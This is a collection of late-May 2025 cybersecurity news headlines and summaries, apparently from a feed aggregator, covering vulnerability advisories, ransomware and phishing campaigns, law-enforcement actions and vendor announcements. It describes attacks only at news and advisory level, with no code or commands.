Incorrect connection releasing causing pool exhaustion (CVE-2025-3864) has been found in hackney software.

https://cert.pl/en/posts/2025/05/CVE-2025-3864/
Conoa and Sysdig: A powerful partnership for comprehensive cloud and container security
2025-05-28T10:00:00Z | 1748426400

Kubernetes has gone from experiment to essential — powering everything from fintech apps to telecom infrastructure and government services. But... The post Conoa and Sysdig: A powerful partnership for comprehensive cloud and container security appeared first on Sysdig.

https://sysdig.com/blog/conoa-and-sysdig-for-comprehensive-cloud-and-container-security/
How 'Browser-in-the-Middle' Attacks Steal Sessions in Seconds
2025-05-28T09:32:00Z | 1748424720

Would you expect an end user to log on to a cybercriminal’s computer, open their browser, and type in their usernames and passwords? Hopefully not! But that’s essentially what happens if they fall victim to a Browser-in-the-Middle (BitM) attack. Like Man-in-the-Middle (MitM) attacks, BiTM sees criminals look to control the data flow between the victim’s computer and the target service, as...

https://thehackernews.com/2025/05/how-browser-in-middle-attacks-steal.html
251 Amazon-Hosted IPs Used in Exploit Scan Targeting ColdFusion, Struts, and Elasticsearch
2025-05-28T09:23:00Z | 1748424180

Cybersecurity researchers have disclosed details of a coordinated cloud-based scanning activity that targeted 75 distinct "exposure points" earlier this month. The activity, observed by GreyNoise on May 8, 2025, involved as many as 251 malicious IP addresses that are all geolocated to Japan and hosted by Amazon. "These IPs triggered 75 distinct behaviors, including CVE exploits,...

https://thehackernews.com/2025/05/251-amazon-hosted-ips-used-in-exploit.html
NSFOCUS Recognized by Forrester in The Network Analysis and Visibility (NAV) Solution Landscape
2025-05-28T09:03:05Z | 1748422985

Santa Clara, Calif. May 28, 2025 – Recently, global research and advisory firm Forrester released The Network Analysis and Visibility (NAV) Solutions Landscape, Q2 2025, offering a comprehensive analysis of market dynamics, technology trends, and product capabilities. NSFOCUS has once again [1] been included in this report. Forrester’s reports on specific technical fields are highly recognized worldwide. […] The post NSFOCUS Recognized by Forrester in The Network Analysis and Visibility (NAV) Solution Landscape appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..

https://nsfocusglobal.com/nsfocus-recognized-by-forrester-in-the-network-analysis-and-visibility-nav-solution-landscape/
NSFOCUS Recognized by Forrester in The Network Analysis and Visibility (NAV) Solution Landscape
2025-05-28T09:03:05Z | 1748422985

Santa Clara, Calif. May 28, 2025 – Recently, global research and advisory firm Forrester released The Network Analysis and Visibility (NAV) Solutions Landscape, Q2 2025, offering a comprehensive analysis of market dynamics, technology trends, and product capabilities. NSFOCUS has once again [1] been included in this report. Forrester’s reports on specific technical fields are highly recognized worldwide. […] The post NSFOCUS Recognized by Forrester in The Network Analysis and Visibility (NAV) Solution Landscape appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..

https://nsfocusglobal.com/nsfocus-recognized-by-forrester-in-the-network-analysis-and-visibility-nav-solution-landscape/
Apple Stops 1.9M Risky Apps, Terminates 146K Fraud Accounts in 2024
2025-05-28T07:59:32Z | 1748419172

Apple, in its latest App Store fraud analysis, revealed that the company prevented more than $2 billion in potentially fraudulent transactions in 2024 alone. This contributes to a staggering total of $9 billion in fraudulent activities thwarted since 2019.   With more than 813 million visitors weekly and active operations in 175 regions, maintaining the platform’s integrity requires Apple to protect its users and upgrade defenses. Here is a quick breakdown of the 2024 Apple App Store fraud analysis.  A Layered Defense Against Fraudulent Transactions  To address a rising tide of deceptive tactics, Apple employs a multi-pronged strategy that includes both automated systems and human oversight. In 2024, Apple rejected over 1.9 million app submissions for not meeting the platform’s stringent standards, which include checks for reliability, privacy, and potential fraud. Of these, 400,000 apps were denied specifically for privacy violations, while over 320,000 were flagged for spam, copying, or misleading content.  App Review remains a cornerstone of Apple’s defense mechanism, with a team that reviews an average of 150,000 app submissions each week. In total, over 7.7 million submissions were assessed in 2024. Apple reports that more than 37,000 apps were removed for fraudulent activity, many of which were linked to broader developer networks attempting to bypass scrutiny. One method fraudsters use is hiding deceptive features in apps that only activate after passing initial review. In response, Apple rejected over 43,000 submissions for containing hidden or undocumented features in 2024.  Cracking Down on App Store Fraud  Fraud isn’t limited to apps. Apple also cracked down on account abuse, a common gateway for malicious activity. Last year, more than 146,000 developer accounts were terminated due to fraud, and another 139,000 developer enrollment attempts were rejected outright.  On the consumer side, Apple took decisive action by rejecting over 711 million customer account creation attempts and deactivating nearly 129 million accounts. These accounts often aim to manipulate the App Store’s ratings, reviews, and rankings, distorting the marketplace and undermining legitimate developers.  Apple also extended its scrutiny beyond the App Store’s borders. In 2024, the company detected and blocked over 10,000 unauthorized apps on pirate storefronts, preventing nearly 4.6 million attempts to install or launch apps from unapproved sources.  Fighting App Store Discovery Fraud  Another important front in Apple’s anti-fraud battle is the discovery of fraud apps and developers that manipulate rankings and visibility through artificial means. In 2024, Apple processed more than 1.2 billion ratings and reviews, removing over 143 million fraudulent entries that sought to game the system. The company also removed more than 7,400 apps from App Store charts and nearly 9,500 deceptive apps from search results, leveling the playing field for developers in good standing.  A major highlight of the 2024 App Store fraud analysis was Apple’s protection of its payment infrastructure. Using technologies such as Apple Pay and StoreKit, Apple prevented over $2 billion in fraudulent transactions last year. The company also detected and blocked the use of 4.7 million stolen credit cards and banned over 1.6 million accounts from conducting further transactions.  Apple emphasizes the security advantages of Apple Pay, which utilizes a unique device-specific number and transaction code for each purchase. This means actual card numbers are neither stored on the device nor shared with developers, further mitigating risks.  More than 420,000 apps now utilize StoreKit to power in-app purchases, which Apple says are processed with built-in fraud detection, end-to-end encryption, and user control tools like purchase history, refund support, and subscription management.

https://thecyberexpress.com/apple-app-store-fraud-prevention/
What’s New Device Platform Intelligence on May 28, 2025
2025-05-28T07:53:21Z | 1748418801

Go to Device Platform Intelligence Added Platforms 26 Platforms are added Platform Name Node Type2 Node Type Bootwin CPC220-JF Industrial Computer ICS/OT IoT/OT DrayTek Vigor 166 Router Router/Gateway Router Google Pixel 9a Phone Mobile Phone Mobile Device Honor 300 Ultra Phone Mobile Phone Mobile Device Honor 400 Phone Mobile Phone Mobile Device Honor 400 Pro […]

https://www.genians.com/dpi/dpi-update-notice/device-platform-intelligence-update-notice-may-28-2025/
FBI Warns Silent Ransom Group Targeting U.S. Law Firms Using Social Engineering and Callback Phishing
2025-05-28T07:44:06Z | 1748418246

Overview The U.S. Federal Bureau of Investigation (FBI) has issued a fresh alert warning law firms and cybersecurity professionals about ongoing cyber threat activity linked to the Silent Ransom Group (SRG)—also known as Luna Moth, Chatty Spider, or UNC3753. This threat actor is ramping up operations in 2025, with an increasingly aggressive campaign specifically targeting the legal sector across the United States. Operating since 2022, Silent Ransom Group expanded its tactics in 2025, shifting from callback phishing emails to direct phone-based social engineering. In this tactic, attackers impersonate IT staff to gain unauthorized remote access. Once inside, they exfiltrate sensitive data and demand ransom payments under the threat of public exposure. According to Cyble’s Research and Intelligence Labs (CRIL) researchers, SRG is a financially motivated threat actor that executes callback phishing campaigns without using malware or encryption. “By impersonating IT help desks, they trick employees into installing legitimate RMM tools to gain access and exfiltrate data via tools like WinSCP and Rclone,” CRIL’s researchers said. “They operate with call centers, use tailored infrastructure, and demand ransoms up to $800,000 under the threat of exposure.” Why Law Firms Are Now a Prime Target While Silent Ransom Group has targeted various sectors, including insurance and healthcare, the legal industry has become the group’s focal point since spring 2023. According to the FBI, the motivation is clear: law firms hold highly sensitive information, including intellectual property, financial records, and confidential legal strategies—data that can be exploited or sold for significant gain. SRG's choice of targets indicates a calculated approach: exploiting industries with low tolerance for data exposure and high incentive to pay ransoms quickly and discreetly. Inside the Attack Chain: Callback Phishing and Fake IT Support SRG's hallmark technique has been callback phishing, which tricks targets into calling a fake support number under the guise of resolving bogus subscription charges. These emails, often appearing to be from legitimate vendors, claim small unauthorized charges—usually under $50—to lower suspicion. Victims are instructed to call a number to cancel the charge. Once the target calls, SRG actors send a link to download remote access software—commonly Zoho Assist, AnyDesk, or Syncro—under the pretense of processing the cancellation. After the tool is installed, the attacker silently establishes persistent access. Figure 1. Tools used by the Silent Ransom Group and their use (Source: CRIL) By March 2025, SRG had escalated its tactics by conducting direct phone calls, impersonating IT staff within the victim’s company. Employees are told to join a remote session for “overnight maintenance,” again opening the door for attackers to bypass endpoint protection. Fast, Quiet, and Dangerous: How SRG Exfiltrates Data Once remote access is achieved, SRG wastes no time. Minimal privilege escalation is needed. Data exfiltration tools like WinSCP (Windows Secure Copy) or a stealthy version of Rclone are used immediately. If the compromised machine lacks admin privileges, SRG utilizes portable versions of WinSCP to extract data without detection. The process is silent, fast, and rarely flagged by antivirus software. Once data is exfiltrated, victims receive ransom emails threatening public release unless payment is made. In many cases, SRG follows up with harassing phone calls to company employees, further pressuring firms into negotiation. Indicators of Compromise (IOCs) The FBI notes that SRG leaves behind minimal digital footprints. Traditional detection mechanisms may not trigger alerts. However, defenders are advised to watch for these potential IOCs: Unauthorized downloads of Zoho Assist, Syncro, AnyDesk, Splashtop, or Atera WinSCP or Rclone activity tied to unknown external IP addresses Emails or voicemails from anonymous entities claiming data theft Subscription-related phishing emails urging callback actions Employees receiving suspicious calls from fake IT support claiming to perform routine maintenance These indicators may not definitively confirm SRG presence but should trigger immediate review and threat hunting protocols. Recommendations for Defenders Given SRG’s reliance on social engineering, remote access tools, and stealthy exfiltration methods, the FBI and Cyble strongly recommend the following mitigation strategies: 1. Conduct Employee Awareness Training Ensure all staff can recognize phishing emails, suspicious calls, and deceptive remote access attempts. Encourage skepticism about unsolicited IT support and unknown subscriptions. 2. Establish Clear IT Authentication Protocols Organizations should develop and communicate strict procedures for how internal IT departments authenticate themselves. Any deviation should raise immediate red flags. 3. Limit Remote Access Privileges Disable administrative privileges on employee devices where unnecessary. Implement allowlists for remote access software. 4. Monitor for Unauthorized Tool Usage Deploy endpoint detection and response (EDR) tools capable of flagging unapproved installations of WinSCP, Rclone, or remote desktop utilities. 5. Backup and Isolate Critical Data Maintain encrypted, air-gapped backups of essential legal and client files. Test restore procedures regularly to ensure resilience. 6. Implement Multifactor Authentication (MFA) Require MFA across all employee accounts, especially those with access to sensitive systems or privileged credentials. Social Engineering is Outpacing Malware The Silent Ransom Group exemplifies a growing trend in modern cybercrime: human-centered attack vectors that bypass technical controls altogether. By leveraging psychology and trust, SRG infiltrates even well-defended organizations without needing to exploit vulnerabilities or drop malware. Law firms are ideal targets due to their reputation-centric business models and access to confidential data. These attacks show the importance of treating social engineering threats with the same urgency as traditional cyber intrusions. With attackers evolving their playbooks every few months, defenders must evolve faster. References: https://www.ic3.gov/CSA/2025/250523.pdf The post FBI Warns Silent Ransom Group Targeting U.S. Law Firms Using Social Engineering and Callback Phishing appeared first on Cyble.

https://cyble.com/blog/fbi-warns-silent-ransom-targeting-us-law-firms/
Russian Cyberspy Group ‘Laundry Bear’ tied to Dutch Police Breach
2025-05-28T07:21:00Z | 1748416860

A newly identified Russian cyber-espionage group, dubbed Laundry Bear, has been linked to the September 2024 security breach of the Dutch national police, according to a joint advisory from Dutch intelligence agencies. The breach, first disclosed by the Dutch police (Politie) last year, resulted in the theft of work-related contact details belonging to multiple officers. The stolen information included names, email addresses, phone numbers, and in some instances, private personal data. On Tuesday, the Dutch General Intelligence and Security Service (AIVD) and the Military Intelligence and Security Service (MIVD) attributed the attack to Laundry Bear, warning that the group might […] The post Russian Cyberspy Group ‘Laundry Bear’ tied to Dutch Police Breach first appeared on Cybersafe News.

https://cybersafe.news/russian-cyberspy-group-laundry-bear-tied-to-dutch-police-breach/
DragonForce exploits SimpleHelp flaws to breach MSP
2025-05-28T07:06:56Z | 1748416016

Sophos researchers have uncovered a cyberattack in which a DragonForce ransomware operator exploited three chained vulnerabilities in the SimpleHelp remote management tool to compromise a managed service provider (MSP) and its customers. SimpleHelp is remote support and access software commonly used by IT teams to troubleshoot and maintain client systems. The attackers leveraged three recently disclosed vulnerabilities—CVE-2024-57727, CVE-2024-57728, and CVE-2024-57726—to gain initial access and escalate privileges. CVE-2024-57727 (CVSS 7.5): An unauthenticated path traversal flaw that allows attackers to download arbitrary files, including serverconfig.xml, which contains encrypted admin and technician credentials and other sensitive data protected by a hardcoded key. CVE-2024-57728 […] The post DragonForce exploits SimpleHelp flaws to breach MSP first appeared on Cybersafe News.

https://cybersafe.news/dragonforce-exploits-simplehelp-flaws-to-breach-msp/
Apple Blocks $9 Billion in Fraud Over 5 Years Amid Rising App Store Threats
2025-05-28T06:11:00Z | 1748412660

Apple on Tuesday revealed that it prevented over $9 billion in fraudulent transactions in the last five years, including more than $2 billion in 2024 alone. The company said the App Store is confronted by a wide range of threats that seek to defraud users in various ways, ranging from "deceptive apps designed to steal personal information to fraudulent payment schemes that attempt to exploit...

https://thehackernews.com/2025/05/apple-blocks-9-billion-in-fraud-over-5.html
ZDI-CAN-27284: Autodesk
2025-05-28T05:00:00Z | 1748408400

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Mat Powell of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-28, 9 days ago. The vendor is given until 2025-09-25 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27229: Docker
2025-05-28T05:00:00Z | 1748408400

A CVSS score 8.2 AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H severity vulnerability discovered by 'Nitesh Surana (niteshsurana.com) of Trend Research' was reported to the affected vendor on: 2025-05-28, 9 days ago. The vendor is given until 2025-09-25 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27254: Autodesk
2025-05-28T05:00:00Z | 1748408400

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Mat Powell of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-28, 9 days ago. The vendor is given until 2025-09-25 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27277: Ollama
2025-05-28T05:00:00Z | 1748408400

A CVSS score 7.5 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H severity vulnerability discovered by 'Nicholas Zubrisky (@NZubrisky) of Trend Research' was reported to the affected vendor on: 2025-05-28, 9 days ago. The vendor is given until 2025-09-25 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-25-309: (Pwn2Own) Canon imageCLASS MF656Cdw sfpcmAuthenticateSecAdmin Stack-based Buffer Overflow Remote Code Execution Vulnerability
2025-05-28T05:00:00Z | 1748408400

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Canon imageCLASS MF656Cdw printers. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-2146.

http://www.zerodayinitiative.com/advisories/ZDI-25-309/
Security Alert (A25-05-18): Multiple Vulnerabilities in Firefox
2025-05-28T04:00:00Z | 1748404800

Mozilla has published the advisories (MFSA2025-42, MFSA2025-43, and MFSA2025-44) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-05-19): Multiple Vulnerabilities in Google Chrome
2025-05-28T04:00:00Z | 1748404800

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
The Critical Role of Mean Time to Remediate
2025-05-28T04:00:00Z | 1748404800

Every minute shaved off the remediation process translates to reduced risk and a stronger, more resilient organization.

https://www.securitymagazine.com/articles/101647-the-critical-role-of-mean-time-to-remediate
Hackers Are Calling Your Office: FBI Alerts Law Firms to Luna Moth’s Stealth Phishing Campaign
2025-05-28T03:17:09Z | 1748402229

May 27, 2025Ravie LakshmananData Breach / Social Engineering The U.S. Federal Bureau of Investigation (FBI) has warned of social engineering attacks mounted by a criminal extortion actor known as Luna Moth targeting law firms over the past two years. The campaign leverages “information technology (IT) themed social engineering calls, and callback phishing emails, to gain […]

https://thecyberpost.com/news/hackers/hackers-are-calling-your-office-fbi-alerts-law-firms-to-luna-moths-stealth-phishing-campaign/
Google Chrome Multiple Vulnerabilities
2025-05-28T03:00:00Z | 1748401200

Multiple vulnerabilities were identified in Google Chrome. A remote attacker could exploit some of these vulnerabilities to trigger sensitive information disclosure, denial of service condition, data manipulation and remote code execution on the targeted system. Impact Denial of Service Remote Code Execution Information Disclosure Data Manipulation System / Technologies affected Google Chrome prior to 137.0.7151.55 (Linux) Google Chrome prior to 137.0.7151.55/56 (Mac) Google Chrome prior to 137.0.7151.55/56 (Windows) Solutions Before installation of the software, please visit the software vendor web-site for more details. Apply fixes issued by the vendor:   Update to version 137.0.7151.55 (Linux) or later Update to version 137.0.7151.55/56 (Mac) or later Update to version 137.0.7151.55/56 (Windows) or later

https://www.hkcert.org/security-bulletin/google-chrome-multiple-vulnerabilities_20250528
Data Security Management: Why it Matters & How to Do it Right
2025-05-28T02:00:00Z | 1748397600

Data security management is the process of protecting digital information throughout its lifecycle from unauthorized access, corruption, or theft.

https://www.opswat.com/blog/data-security-management
Mozilla Products Multiple Vulnerabilities
2025-05-28T01:00:00Z | 1748394000

Multiple vulnerabilities were identified in Mozilla Products. A remote attacker could exploit some of these vulnerabilities to trigger remote code execution,  denial of service condition, security restriction bypass and sensitive information disclosure on the targeted system. Impact Information Disclosure Remote Code Execution Denial of Service Security Restriction Bypass System / Technologies affected Versions prior to:   Thunderbird 128.11 Thunderbird 139 Firefox ESR 128.11 Firefox ESR 115.24 Firefox 139 Solutions Before installation of the software, please visit the vendor web-site for more details. Apply fixes issued by the vendor:   Thunderbird 128.11 Thunderbird 139 Firefox ESR 128.11 Firefox ESR 115.24 Firefox 139

https://www.hkcert.org/security-bulletin/mozilla-products-multiple-vulnerabilities_20250528
Multiples vulnérabilités dans Google Chrome (28 mai 2025)
2025-05-28T00:00:00Z | 1748390400

De multiples vulnérabilités ont été découvertes dans Google Chrome. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0455/
Multiples vulnérabilités dans Citrix et Xen (28 mai 2025)
2025-05-28T00:00:00Z | 1748390400

De multiples vulnérabilités ont été découvertes dans Citrix et Xen. Elles permettent à un attaquant de provoquer une élévation de privilèges.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0456/
Multiples vulnérabilités dans les produits Mozilla (28 mai 2025)
2025-05-28T00:00:00Z | 1748390400

De multiples vulnérabilités ont été découvertes dans les produits Mozilla. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0454/
Multiples vulnérabilités dans Curl (28 mai 2025)
2025-05-28T00:00:00Z | 1748390400

De multiples vulnérabilités ont été découvertes dans Curl. Elles permettent à un attaquant de provoquer une atteinte à la confidentialité des données et un contournement de la politique de sécurité.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0458/
Vulnérabilité dans Traefik (28 mai 2025)
2025-05-28T00:00:00Z | 1748390400

Une vulnérabilité a été découverte dans Traefik. Elle permet à un attaquant de provoquer un contournement de la politique de sécurité.

https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-0457/
Why You Need an NDR to Protect Your Modern Network by Zoey Chu
2025-05-28T00:00:00Z | 1748390400

Modern networks are complex, dynamic, and under constant threat. Learn how NDR adds critical in-network protection to stop today’s cyberattacks.

https://www.vectra.ai/blog/why-you-need-an-ndr-to-protect-your-modern-network
GreyNoise Discovers Stealthy Backdoor Campaign Affecting Thousands of ASUS Routers
2025-05-28T00:00:00Z | 1748390400

GreyNoise uncovers a stealth campaign exploiting ASUS routers, enabling persistent backdoor access via CVE-2023-39780 and unpatched techniques. Learn how attackers evade detection, how GreyNoise discovered it with AI-powered tooling, and what defenders need to know.

https://www.greynoise.io/blog/stealthy-backdoor-campaign-affecting-asus-routers
Understanding the Cookie-Bite MFA Bypass Risk
2025-05-27T20:28:48Z | 1748377728

The Cookie-Bite attack is an advanced evolution of Pass-the-Cookie exploits. This tactic bypasses Multi-Factor Authentication (MFA) by leveraging stolen authentication cookies—such as Azure Entra ID’s ESTSAUTH and ESTSAUTHPERSISTENT—to impersonate users.

https://mixmode.ai/blog/understanding-the-cookie-bite-mfa-bypass-risk/
Red Canary to join Zscaler
2025-05-27T20:25:42Z | 1748377542

Today we are announcing a major milestone in our journey – Zscaler has signed a definitive agreement to acquire Red Canary.

https://redcanary.com/blog/news-events/redcanary-joining-zscaler/
Google Chrome security advisory (AV25-299)
2025-05-27T20:09:23Z | 1748376563

https://cyber.gc.ca/en/alerts-advisories/google-chrome-security-advisory-av25-299
RMM: Tool Convenience and Control Comes with a Cost
2025-05-27T19:47:31Z | 1748375251

Imagine this scenario: You’re winding down for the evening, having checked the locks and closed the windows, feeling secure enough to turn in for the night. But you forget to lock your vehicle. Sitting in plain sight on the sun visor is your garage door opener, an otherwise trusted tool now turned into an entry […] The post RMM: Tool Convenience and Control Comes with a Cost  appeared first on Binary Defense.

https://www.binarydefense.com/resources/blog/rmm-tool-convenience-and-control-comes-with-a-cost/
Executive summary and joint guidance on security information and event management and security orchestration, automation and response
2025-05-27T18:47:30Z | 1748371650

https://cyber.gc.ca/en/news-events/executive-summary-joint-guidance-security-information-event-management-security-orchestration-automation-response
Adidas customers’ personal information at risk after data breach
2025-05-27T18:34:42Z | 1748370882

Lovers of Adidas clothes would be wise to be on their guard against phishing attacks, after the German sportswear giant revealed that a cyber attack had exposed the personal information of customers. Read more in my article on the Hot for Security blog.

https://www.bitdefender.com/en-us/blog/hotforsecurity/adidas-customers-personal-information-at-risk-after-data-breach
How User Behavior Analytics (UBA) Fits Into the Security Stack
2025-05-27T18:08:11Z | 1748369291

There are many ways for attackers to move quietly through the network, using stolen credentials and subtle behavioral shifts to slip past firewalls and signature-based detection. But by analyzing how users and systems behave under normal conditions, user behavior analytics (UBA) help identify deviations that could signal insider threats, account compromises, or stealthy attacks.  How User Behavior Analytics Detects Anomalies  At the core of UBA is... Read more » The post How User Behavior Analytics (UBA) Fits Into the Security Stack appeared first on Plixer.

https://www.plixer.com/blog/user-behavior-analytics/
Level Up Your Security: Google Cloud Enhances Load Balancers with HUMAN Security’s Anti-Fraud Expertise
2025-05-27T17:42:06Z | 1748367726

In today’s rapidly evolving digital world, where threats are constantly emerging and user expectations are higher than ever, maintaining a secure, reliable, and high-performing online presence is critical. Google Cloud Application Load Balancers have long been a cornerstone of this effort, expertly managing traffic and ensuring seamless user experiences. Now, Google Cloud takes application security […] The post Level Up Your Security: Google Cloud Enhances Load Balancers with HUMAN Security’s Anti-Fraud Expertise appeared first on HUMAN Security.

https://www.humansecurity.com/learn/blog/google-cloud-enhances-load-balancers-human-security-anti-fraud-expertise/
Citrix security advisory (AV25-298)
2025-05-27T17:33:19Z | 1748367199

https://cyber.gc.ca/en/alerts-advisories/citrix-security-advisory-av25-298
Huawei's New Single SitePower Solution Creates Four Synergies to Accelerate Site Intelligence
2025-05-27T17:22:00Z | 1748366520

During the 9th Global ICT Energy Efficiency Summit in Dubai, Huawei showcased its next-generation digital and intelligent site power facility solution Single SitePower

//www.huawei.com/en/news/2025/1/9th-energy-efficiency-summit
New Self-Spreading Malware Infects Docker Containers to Mine Dero Cryptocurrency
2025-05-27T16:23:00Z | 1748362980

Misconfigured Docker API instances have become the target of a new malware campaign that transforms them into a cryptocurrency mining botnet. The attacks, designed to mine for Dero currency, is notable for its worm-like capabilities to propagate the malware to other exposed Docker instances and rope them into an ever-growing horde of mining bots. Kaspersky said it observed an unidentified threat...

https://thehackernews.com/2025/05/new-self-spreading-malware-infects.html
Inside GitHub: How we hardened our SAML implementation
2025-05-27T16:00:00Z | 1748361600

Maintaining and developing complex and risky code is never easy. See how we addressed the challenges of securing our SAML implementation with this behind-the-scenes look at building trust in our systems. The post Inside GitHub: How we hardened our SAML implementation appeared first on The GitHub Blog.

https://github.blog/security/web-application-security/inside-github-how-we-hardened-our-saml-implementation/
Inside GitHub: How we hardened our SAML implementation
2025-05-27T16:00:00Z | 1748361600

Maintaining and developing complex and risky code is never easy. See how we addressed the challenges of securing our SAML implementation with this behind-the-scenes look at building trust in our systems. The post Inside GitHub: How we hardened our SAML implementation appeared first on The GitHub Blog.

https://github.blog/security/web-application-security/inside-github-how-we-hardened-our-saml-implementation/
The future of AI agents—and why OAuth must evolve
2025-05-27T16:00:00Z | 1748361600

Our industry needs to continue working together on identity standards for agent access across systems. Read about how Microsoft is building a robust and sophisticated set of agents. The post The future of AI agents—and why OAuth must evolve appeared first on Microsoft Security Blog.

https://techcommunity.microsoft.com/blog/microsoft-entra-blog/the-future-of-ai-agents%E2%80%94and-why-oauth-must-evolve/3827391
Eliminate Risk with Precision: Introducing Vulnerability Detection Sources in VMDR
2025-05-27T15:00:00Z | 1748358000

In the race against cyber threats, finding vulnerabilities is no longer enough. True security comes from understanding them—where they exist, how they were discovered, and what risks they pose. One of the most overlooked aspects in vulnerability management is knowing the source of detection. Without it, organizations may waste valuable time chasing the wrong threats […]

https://blog.qualys.com/category/product-tech/vulnmgmt-detection-response
Securing Healthcare: Safeguarding Patient Care and Privacy Through Agile Cyber Strategies
2025-05-27T15:00:00Z | 1748358000

In today’s digital world, cybersecurity is foundational to providing adequate patient care — whether critical, preventative, or otherwise.

https://www.securitymagazine.com/articles/101649-securing-healthcare-safeguarding-patient-care-and-privacy-through-agile-cyber-strategies
Mozilla security advisory (AV25-297)
2025-05-27T14:16:21Z | 1748355381

https://cyber.gc.ca/en/alerts-advisories/mozilla-security-advisory-av25-297
Cybercriminals Clone Antivirus Site to Spread Venom RAT and Steal Crypto Wallets
2025-05-27T14:10:00Z | 1748355000

Cybersecurity researchers have disclosed a new malicious campaign that uses a fake website advertising antivirus software from Bitdefender to dupe victims into downloading a remote access trojan called Venom RAT. The campaign indicates a "clear intent to target individuals for financial gain by compromising their credentials, crypto wallets, and potentially selling access to their systems," the...

https://thehackernews.com/2025/05/cybercriminals-clone-antivirus-site-to_4.html
The AI Fix #52: AI adopts its own social norms, and AI DJ creates diversity scandal
2025-05-27T14:03:23Z | 1748354603

In episode 52 of The AI Fix, our hosts watch a non-existent musical about garlic bread, Graham shares a summer reading list of books that don't exist, Mark feels nauseous after watching a video of Sam Altman and Jony Ive waffling about products that don't exist, some non-existent robots stack empty crates in a factory that doesn't exist, and OpenAI releases Codex, an AI agent destined to make your software engineering job not exist. Graham reveals how an AI called "Thy" has ruined his childhood dream of becoming a late night radio DJ, and Mark looks at an experiment that showed groups of AI agents spontaneously create social norms—the building blocks of a society. All this and much more is discussed in the latest edition of "The AI Fix" podcast by Graham Cluley and Mark Stockley.

https://grahamcluley.com/the-ai-fix-52/
MoU between SSSCIP and NCSC-FI - Finland and Ukraine strengthen collaboration in promoting Cyber Security
2025-05-27T14:02:44Z | 1748354564

Finland and Ukraine are strengthening their cooperation in promoting cyber security and cyber protection. The countries signed a Memorandum of Understanding (MoU) agreement, which aims to reinforce collaboration, facilitate sharing of best practices and technical information between countries cyber security authorities.

https://www.kyberturvallisuuskeskus.fi/en/news/mou-between-ssscip-and-ncsc-fi-finland-and-ukraine-strengthen-collaboration-promoting-cyber
MoU between SSSCIP and NCSC-FI - Finland and Ukraine strengthen collaboration in promoting Cyber Security
2025-05-27T14:02:44Z | 1748354564

Finland and Ukraine are strengthening their cooperation in promoting cyber security and cyber protection. The countries signed a Memorandum of Understanding (MoU) agreement, which aims to reinforce collaboration, facilitate sharing of best practices and technical information between countries cyber security authorities.

https://www.kyberturvallisuuskeskus.fi/en/news/mou-between-ssscip-and-ncsc-fi-finland-and-ukraine-strengthen-collaboration-promoting-cyber
How These Cyber Heroes Are Securing Our Digital World
2025-05-27T14:00:00Z | 1748354400

They don’t wear capes, but they’re safeguarding your data, your networks and your future

https://www.security.com/expert-perspectives/how-these-cyber-heroes-are-securing-our-digital-world
16 Defendants Federally Charged in Connection with DanaBot Malware Scheme That Infected Computers Worldwide
2025-05-27T13:51:10Z | 1748353870

Blogs Blog 16 Defendants Federally Charged in Connection with DanaBot Malware Scheme That Infected Computers Worldwide “LOS ANGELES – A federal grand jury indictment and criminal complaint unsealed today charge 16 defendants who allegedly developed and deployed the DanaBot malware which a Russia-based cybercrime organization controlled and deployed, infecting more than 300,000 victim computers around the world, facilitated fraud and […] The post 16 Defendants Federally Charged in Connection with DanaBot Malware Scheme That Infected Computers Worldwide appeared first on Flashpoint.

https://flashpoint.io/blog/16-defendants-federally-charged-in-connection-with-danabot-malware-scheme-that-infected-computers-worldwide/
Is your customer data ready for CX transformation?
2025-05-27T13:40:00Z | 1748353200

When we look at evolving customer communications, we often focus on improving the experience by adding new delivery channels, improving content by adding color and variable images based on the audience or improving self-service. Some organizations focus on making the communications interactive in digital channels, adding video or improving self-serve preference management to encourage digital adoption and reduce print costs.  Despite efforts over the years to merge transactional and promotional (marketing) communications, it’s still more common than not that these communications continue to be managed and generated in siloed systems, separating their stakeholders in name of privacy and security of the data. Marketing needs to have the freedom to explore any and all options when it comes to lead generation and customer nurturing while transactional communications need to maintain guardrails to retain trust with existing customers by protecting their sensitive data.  Unfortunately, this approach often impacts the customer experience. Inconsistencies in communication look and feel, silos by line of business, disconnected or limited integration between systems ultimately leaves gaps in the customer’s ability to navigate the vast web pages and content available through self-serve. This causes them to turn to support channels such as the contact center, customer service, agents, chats, etc. More often than not, these employees in the front lines of customer support often request patience from the customer as they need to navigate several internal systems in an effort to find the desired information or answers.  While many strategies look to new software, business process automation or to redesign communications as a way to improve the overall experience, the goldmine at 